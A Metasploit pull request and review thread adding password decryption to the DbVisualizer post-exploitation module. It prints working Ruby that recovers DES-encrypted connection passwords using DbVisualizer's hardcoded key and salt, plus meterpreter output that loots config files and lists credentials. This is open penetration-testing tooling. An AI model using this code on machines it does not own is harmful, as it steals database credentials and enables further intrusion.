### PR TITLE
Decrypt encrypted passwords in DBVisualizer

### PR DESCRIPTION
**Pull request by void-in**
The DBVisualizer encrypts the connection passwords using a hard coded encryption key and salt. It is using DES encryption where the derived key and IV is obtained by taking MD5 of the hardcoded encryption key and salt. 

This PR add the decryption routine which takes the encrypted password and show the plaintext version of the password to the end user.

Before this PR, the module output is:

``` ruby
[+] DbVisualizer version :  9.2.7
[+] Reporting 1.1.1.1
[+] Reporting 1.1.1.1


Dbvis Databases
===============

  Alias                          Type        Server        Port   Database  Namespace  Userid
  -----                          ----        ------        ----   --------  ---------  ------
  Test Connection of MySQL       mysql       1.1.1.1       3306   test_db              test_user_for_msf
  Test connection of PostgreSQL  postgresql  1.1.1.1       54321  test_db              test_user_for_msf_postgresql

[+] Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun !

[+] Databases settings stored in: /root/.msf4/loot/20150528102825_default_1.1.1.1_dbvis.databases_224726.txt
[*] Downloading C:\Users\User-Name\.dbvis\config70\dbvis.xml
[+] dbvis.xml saved to /root/.msf4/loot/20150528102825_default_1.1.1.1_dbvis.xml_883881.txt
[*] Post module execution completed
```

With this PR, the output is:

``` ruby
[+] DbVisualizer version: 9.2.7
[+] Reporting 1.1.1.1
[+] Reporting 1.1.1.1

DbVisualizer Databases
======================

  Alias                          Type        Server        Port   Database  Namespace  Userid                        Password
  -----                          ----        ------        ----   --------  ---------  ------                        --------
  Test Connection of MySQL       mysql       1.1.1.1       3306   test_db              test_user_for_msf             test_pas
  Test connection of PostgreSQL  postgresql  1.1.1.1       54321  test_db              test_user_for_msf_postgresql  test_pas

[+] Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!

[+] Databases settings stored in: /root/.msf4/loot/20150528103211_default_1.1.1.1_dbvis.databases_679277.txt
[*] Downloading C:\Users\User-Name\.dbvis\config70\dbvis.xml
[+] dbvis.xml saved to /root/.msf4/loot/20150528103212_default_1.1.1.1_dbvis.xml_340682.txt
[*] Post module execution completed
```

The user can set the PASSPHRASE and ITERATION_COUNT datastore options in case these are updated in the future.

### CODE REVIEW

**Comment by wchen-r7** [comment]
@void-in So I'm testing this against DBVisualizer 9.2.7, and it looks like the module is having trouble decrypting my password.

So first off, my password in the config file looks like this:

screen shot 2015-05-28 at 7 01 16 pm

As you can see, it's ```BIWKB1z98ec=```

I run the module:

```
meterpreter > run post/multi/gather/dbvis_enum

[*] Reading: C:\Documents and Settings\Administrator\.dbvis\config70\dbvis.xml

[+] DbVisualizer version: 9.2.7

DbVisualizer Databases
======================

  Alias  Type   Server     Port  Database  Namespace  Userid  Password
  -----  ----   ------     ----  --------  ---------  ------  --------
  mysql  mysql  localhost  3306                       root    
```

No password.

And then I tried just the decryption portion of the code (you can copy all of this in irb under the meterpreter prompt):

```
  def decrypt_password(enc_password)
    enc_password = Rex::Text.decode_base64(enc_password)
    dk, iv = get_derived_key
    des = OpenSSL::Cipher.new('DES-CBC')
    des.key = dk
    des.iv = iv

    des.update(enc_password)
  end

  def get_derived_key
    key = 'qinda' + ([-114,18,57,-100,7,114,111,90].pack('C*'))
    10.times do
      key = Digest::MD5.digest(key)
    end
    return key[0,8], key[8,8]
  end

  puts decrypt_password("BIWKB1z98ec=")
```

And I got nothing (an empty string).

An idea what's wrong?

**Comment by void-in** [comment]
@wchen-r7 That is strange. Because I just tested your password at my end and it is decrypted successfully (username: root, password: test). Let me test some more.

**Comment by wchen-r7** [comment]
Ok I will try again, thanks!

**Comment by wchen-r7** [comment]
@void-in yup, seems to work well now. Thanks!

```
meterpreter > run post/multi/gather/dbvis_enum

[*] Reading: C:\Documents and Settings\Administrator\.dbvis\config70\dbvis.xml

[+] DbVisualizer version: 9.2.7

DbVisualizer Databases
======================

  Alias  Type   Server     Port  Database  Namespace  UserID  Password
  -----  ----   ------     ----  --------  ---------  ------  --------
  mysql  mysql  localhost  3306                       root    mypassword
```

**Comment by void-in** [comment]
@wchen-r7 Great. Thanks a lot for testing and landing.

**Pull request merged**
